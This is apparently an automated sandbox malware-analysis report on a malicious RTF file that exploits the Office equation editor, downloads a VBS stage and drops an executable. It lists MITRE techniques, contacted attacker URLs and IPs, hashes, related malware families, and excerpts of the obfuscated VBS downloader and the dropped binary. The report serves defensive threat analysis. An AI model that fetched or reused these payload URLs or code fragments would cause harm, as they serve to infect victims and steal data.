          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts33
          Exploitation for Client Execution          		111
          Scripting          		311
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Query Registry          		Remote Services11
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Modify Registry          		LSASS Memory12
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
          Virtualization/Sandbox Evasion          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
          Process Injection          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Obfuscated Files or Information          		DCSync1
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Install Root Certificate          		Proc Filesystem13
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520425 Sample: eMJ2QgQF4u.rtf Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 38 Suricata IDS alerts for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 9 other signatures 2->44 9 WINWORD.EXE 291 13 2->9         started        process3 process4 11 EQNEDT32.EXE 12 9->11         started        16 EQNEDT32.EXE 9->16         started        dnsIp5 36 185.235.137.223, 49165, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 11->36 30 C:\Users\...\seethedifferentofpicture.vbs, ASCII 11->30 dropped 32 C:\Users\...\seethedifferentofpicture[1].vbs, ASCII 11->32 dropped 56 Office equation editor establishes network connection 11->56 58 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->58 18 wscript.exe 2 11->18         started        file6 signatures7 process8 file9 28 C:\Users\user\AppData\...\temp_executable.exe, PE32 18->28 dropped 46 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->46 22 temp_executable.exe 12 2 18->22         started        signatures10 process11 dnsIp12 34 dl.zerotheme.ir 185.18.213.20, 443, 49166, 49167 SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR Iran (ISLAMIC Republic Of) 22->34 48 Multi AV Scanner detection for dropped file 22->48 50 Installs new ROOT certificates 22->50 52 Machine Learning detection for dropped file 22->52 54 3 other signatures 22->54 26 aspnet_compiler.exe 22->26         started        signatures13 process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          eMJ2QgQF4u.rtf47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\temp_executable.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\temp_executable.exe21%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://ocsp.entrust.net030%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dl.zerotheme.ir
          		185.18.213.20
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exetrue
              		unknown
              https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dlltrue
                		unknown
                http://185.235.137.223/90/seethedifferentofpicture.vbstrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://crl.entrust.net/server1.crl0temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dlltemp_executable.exe, 00000006.00000002.378697765.000000000257F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025F4000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://ocsp.entrust.net03temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://185.235.137.223/90/seethedifferentofpicture.vbsoEQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://dl.zerotheme.irXtemp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.diginotar.nl/cps/pkioverheid0temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://dl.zerotheme.irtemp_executable.exe, 00000006.00000002.378697765.000000000265F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.235.137.223/90/seethedifferentofpicture.vbsjEQNEDT32.EXE, 00000002.00000002.360437444.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://ocsp.entrust.net0Dtemp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametemp_executable.exe, 00000006.00000002.378697765.00000000025FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://secure.comodo.com/CPS0temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.entrust.net/2048ca.crl0temp_executable.exe, 00000006.00000002.378543206.00000000008C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://dl.zerotheme.irtemp_executable.exe, 00000006.00000002.378697765.000000000261B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          185.235.137.223
                                          		unknownIran (ISLAMIC Republic Of)
                                          		202391AFRARASAIRtrue
                                          185.18.213.20
                                          		dl.zerotheme.irIran (ISLAMIC Republic Of)
                                          		44285SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIRtrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1520425
                                          Start date and time:2024-09-27 10:56:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:12
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:eMJ2QgQF4u.rtf
                                          renamed because original name is a hash value
                                          Original Sample Name:d805f910e1756735e34523281088f2ed.rtf
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winRTF@9/10@1/2
                                          EGA Information:
                                          • Successful, ratio: 66.7%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 38
                                          • Number of non-executed functions: 53
                                          Cookbook Comments:
                                          • Found application associated with file extension: .rtf
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Active ActiveX Object
                                          • Scroll down
                                          • Close Viewer

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                                          • Execution Graph export aborted for target EQNEDT32.EXE, PID 3340 because there are no executed function
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: eMJ2QgQF4u.rtf

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          04:56:59API Interceptor287x Sleep call for process: EQNEDT32.EXE modified
                                          04:57:02API Interceptor72x Sleep call for process: wscript.exe modified
                                          04:57:04API Interceptor66x Sleep call for process: temp_executable.exe modified
                                          04:57:11API Interceptor3x Sleep call for process: aspnet_compiler.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          185.235.137.223QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                          • 185.235.137.223/90/seethedifferentofpicture.vbs
                                          RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                          • 185.235.137.223/200/NRSCER.txt
                                          buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                          • 185.235.137.223/69/shoppingfestivalsessiononherewithyou.tIF
                                          185.18.213.20QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            dl.zerotheme.irQT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                            • 185.18.213.20

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AFRARASAIRQT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                            • 185.235.137.223
                                            RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                            • 185.235.137.223
                                            buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                            • 185.235.137.223
                                            SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elfGet hashmaliciousMiraiBrowse
                                            • 185.49.104.3
                                            an3gpDV7uW.exeGet hashmaliciousLummaCBrowse
                                            • 185.235.137.54
                                            paTWrNAira.exeGet hashmaliciousLummaCBrowse
                                            • 185.235.137.54
                                            2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • 185.235.137.54
                                            xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • 185.235.137.54
                                            PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • 185.235.137.54
                                            TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • 185.235.137.54
                                            SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIRQT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                            • 185.18.213.20
                                            https://monogogo.info/JQJMLAWN#em=npaladino@bigge.comGet hashmaliciousPhisherBrowse
                                            • 45.140.247.113
                                            qD7cj0t7Ag.elfGet hashmaliciousMirai, MoobotBrowse
                                            • 45.140.242.232
                                            mDjOa15q8T.elfGet hashmaliciousMiraiBrowse
                                            • 45.140.241.81
                                            NiAsQEhh9p.elfGet hashmaliciousMiraiBrowse
                                            • 45.156.181.90
                                            enEQvjUlGl.elfGet hashmaliciousMiraiBrowse
                                            • 45.140.241.74
                                            InLf78j8qW.elfGet hashmaliciousMiraiBrowse
                                            • 45.140.242.215
                                            4KXNneQz0d.elfGet hashmaliciousUnknownBrowse
                                            • 185.182.248.108
                                            hAs0X5MYKz.elfGet hashmaliciousMiraiBrowse
                                            • 45.140.242.239
                                            xbcp1b1Dph.elfGet hashmaliciousMiraiBrowse
                                            • 45.156.193.94

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            36f7277af969a6947a61ae0b815907a1QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                            • 185.18.213.20
                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 185.18.213.20
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 185.18.213.20
                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 185.18.213.20
                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 185.18.213.20
                                            BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                            • 185.18.213.20
                                            14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                            • 185.18.213.20
                                            6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                            • 185.18.213.20
                                            RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                            • 185.18.213.20
                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 185.18.213.20

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\temp_executable.exeQT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedifferentofpicture[1].vbs

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:ASCII text, with very long lines (65399), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):92431
                                              Entropy (8bit):4.8789339351328405
                                              Encrypted:false
                                              SSDEEP:1536:35VT1rG9XgL21xU47L2HiUYxd9jd4Qyxsyf4SgfAw2zXdcp2bF+Z:JPG9pxh7L2SxKsu4SU0u2bI
                                              MD5:7834CBAFCFAD72B1BDA091F3CCE8E997
                                              SHA1:034AFCB22B254090084269FC8BCD68F64E4A85A8
                                              SHA-256:AAC62555CF55C081E503636CF2D696AB33A789B9D10DDC8A9EF2ED8014890913
                                              SHA-512:FA08EF7847F8F98A6E2442DB45935FBAA30D0C0CD26ABF457F8579FFDACE28D7851D5BBDC7630406C5FCFE74381241ACCD74B72E4DD79E194E1FD481BC06CFFF
                                              Malicious:true
                                              Reputation:low
                                              Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@@@@@@@4fug4@@t@@nNIbg...))M0h;;;Ghpcy...wcm9ncmFtIGNhbm5vdC...iZS...ydW4gaW4gRE9))IG1vZGUuDQ0K&&&@@@@@@@@@@@@@@@@@@...QRQ@@@@))@@ED@@Fvx9GY@@@@@@@@@@@@@@@@@@@@O@@@@DgEL@@))@@@@@@I@@@@@@@@C8@@@@@@@@@@@@@@@@Ep4@@@@@@@@g@@@@@@@@o@@@@@@@@@@...@@@@@@@@g@@@@@@@@@@g@@@@...@@@@@@@@@@@@@@@@@@@@E@@@@@@@@@@@@@@@@@@@@@@@@@@Q@@@@@@g@@@@@@@@@@@@@@@@I@@YIU@@@@...@@@@@@...@@@@@@@@@@@@E@@@@@@E@@@@@@@@@@@@@@@@...@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Lid@@@@...X@@@@@@@@@@M@@@@@@@@Q7@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@K@@@@@@@@w@@@@@@CwSQ@@@@H@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@I@@@@@@C@@@@@@@@@@@@@@@@@@@@@@@

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{104C1C05-5B56-427D-9A18-F09CF519F5E8}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:CE338FE6899778AACFC28414F2D9498B
                                              SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                              SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                              SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EB1C9D8C-3BA0-4F53-9B8A-301D31923000}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16896
                                              Entropy (8bit):3.5808522768349413
                                              Encrypted:false
                                              SSDEEP:384:Q/VXbEoRIdt1LMnoeC26GFYQuLJa18JRdZv8gk8J2+Dgrz:Q/VbIAnoeC26AUU18Fq58J2drz
                                              MD5:C3900D55C838EED92A89FFA290B7C99B
                                              SHA1:EA360506A8DB8C6872A1C2217B0E8F25B33D7DAC
                                              SHA-256:8CB86A7C206AA1D334651A47D3E817453EE8C9B78638E6D07BC22E3C03F9B037
                                              SHA-512:5F903468D2A47C20F97D6D715DEE7B5827BE971A6CBF4CD37F74E4A03E808F931627C09CF136BE92DDAE879A374C82C5C852C53BF88B5BA8B31734BEE011ECAD
                                              Malicious:false
                                              Preview:4.6.2.0.6.8.8.%.=.-.).~.6.1.../.$.?.$.9.;.).?.2...=.&._.-.&.~.?.@.,.+.,.^.).'...~.4.&.|.?.#.6.?.?.~.1.;.!.=...+.`.@.'.1.>.!.?.7.).?.[.5...?.%.|.%...,.2.8._.^...*...4..._.?._.1.+.0.&.%.1.%.)...$...~.[.[.>.&.`.?.?.8.0.'...*.!...(.-...|.?.~...?.>.`.?.0.:.`.8.$.).~.-.;...#.?.+...~.@.;.9.3.-.`.-.-.?.>.`...#.?.5.).8.0.2.?.7.].=.9.*.;.2.*.<.^...+.5.:.$.9.7.1._.:.%.7...?.=...6...+.=.;.?.;.4...~.%.,...?.8.?.6.?.-.?.@...#.8._.2./.6.<.8.#...'.[.<.?.$.:...).4.7.3.5.6.-.,.&.|.?.>.'.(.5.#.?.|.;.[.*.@...$.3.1./.).*.3.%.@.%.*.3...3.6.$.5.+.'.?.'.^.4.(.,...,.0.@.9.;...%.^.^...+.#.....+.?.#.;.,.>.;.-.#...,.1.1.2...?.].]...`...*.:.'.<.0.....&.%.:.~...7.^.%.?.?.9.5.'.).5.#.4.?.%.&...`.,.9.,.,...?.0.2.~./.=.].&.-.0.(.[.-.|.+.~.[.|.&.3.1._.7.9.|.%.1.3.%./.....:.?.*.^.7...].4.?.?...?./._.6...;.!.?.!.~.7.;.=.....5.%.0.;.7.5.4.?.3.6.>.5.!.;.=.0...?.9.<.;.>.^.?...5.&./.8.?.;.-.3.6.:._.@...^.0.?.;.*.0.`.|.=.;...?.8.2.4.?.7.%.+.%.).2...>.:.).2.=._.*._./.>.?.9._...<.%.).,.*.^.3.5.'.'.?.|...?.$.?.!.~.....|.9.!.).?.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F96B07FF-ED02-4BEA-95F3-9B31FFA866FE}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\temp_executable.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\wscript.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):49152
                                              Entropy (8bit):6.632984721949493
                                              Encrypted:false
                                              SSDEEP:768:Ua9FDkXneHCBXyDMLNe9rotBMx251CBXWZBiGRO4TjPZcVP+LWcwTQ1qsL8:Ua92XeiBCd9/o+XWgGRO4HPmN7TQ1tL8
                                              MD5:3E01AC27E853080CA5C92470DF3F738C
                                              SHA1:41B6C3DF03856DDF7A5BA505900A9499A6ABADA1
                                              SHA-256:E350330729257731AC3E4CB80CFCB243F8FD629A2AB5BC11D7A1E89B3945C716
                                              SHA-512:2D4A0A638274A2A3B1B5E6A48E7BFC9A96C8FC113E49A6D89BD4ED3B63B3B3A9410258AA47DE79741C55ADAF24DE417D474CA5971784684870FA469F7C017DFF
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 21%
                                              Joe Sandbox View:
                                              • Filename: QT2Q1292.xla.xlsx, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..f..............0.................. ........@.. ....................................`.....................................W........;...........................I............................................... ............... ..H............text....~... ...................... ..`.reloc..............................@..B.rsrc....;.......<..................@..@........................H.......,J...S...........@..............................................".(.....*....0...........($.....*....0..[........~....~t.......,@.E.........-......&..("...%&(....%&(....%&(....%&(....%&........~.....+..*..0...........~.....+..*..0.................*.0...........(N...*..0...........(O....*.0..........s....(....%&(....%&.....*....0...........~.....+..*..0..K.......(...........sP...(....(....%&.......sP...(....(\.....(....%&..(h...%&.....*..0...........($...*..0..........

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\eMJ2QgQF4u.LNK

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Fri Sep 27 07:56:57 2024, length=108966, window=hide
                                              Category:dropped
                                              Size (bytes):1014
                                              Entropy (8bit):4.5574923796151605
                                              Encrypted:false
                                              SSDEEP:12:8wZHae4FgXg/XAlCPCHaXEzBggB/5YXX+WZWIO2IOicvbsAp5A4K2IeDtZ3YilMQ:8wVjc/XTUzN4XBIteFTIeDv3qai57u
                                              MD5:0188A679B4E9A1EFD8BE440A7CC3F68D
                                              SHA1:5FFFC8D990B2577344ECB5D2BE8572E056E31DE4
                                              SHA-256:EB3DC5D5C31B9CD0B461D7D492F20D0A11A2827F5645B830E8735469AF6A2071
                                              SHA-512:80DACE63F27099D2BC3F82194E6AB819D2AC824B7C707C8B33B8E983F5A5F037CC3A62A6B08765B9006D7749B09AE78B8852DA8D1E80FE4075443C53171A7062
                                              Malicious:false
                                              Preview:L..................F.... ...:..r...:..r.....(5.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....;Y.G..user.8......QK.X;Y.G*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....;Y.G .EMJ2QG~1.RTF..J.......WE..WE.*.........................e.M.J.2.Q.g.Q.F.4.u...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\528110\Users.user\Desktop\eMJ2QgQF4u.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.M.J.2.Q.g.Q.F.4.u...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......528110..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [folders]
                                              Category:dropped
                                              Size (bytes):55
                                              Entropy (8bit):4.676725395303504
                                              Encrypted:false
                                              SSDEEP:3:HLyXWRv4om4FPWRv4ov:HLrv41v4y
                                              MD5:0D49BA26A9D1E5B057B4526E99CF43AA
                                              SHA1:01A558006DBDB62C980C4323016F92BDE57B4AB2
                                              SHA-256:639AD2BCE35E3B66571B386156B458BE22AEC66269181717458AA7C6A76EB06E
                                              SHA-512:68F10E111469235B5A4E0782B399C17EFE84FC56D7E86123A1D63D3172BC1BBCC931E9052FF00E65696DD691ABE19F3AA72169180EEB14347A4C8B8D5A3550DC
                                              Malicious:false
                                              Preview:[misc]..eMJ2QgQF4u.LNK=0..[folders]..eMJ2QgQF4u.LNK=0..

                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
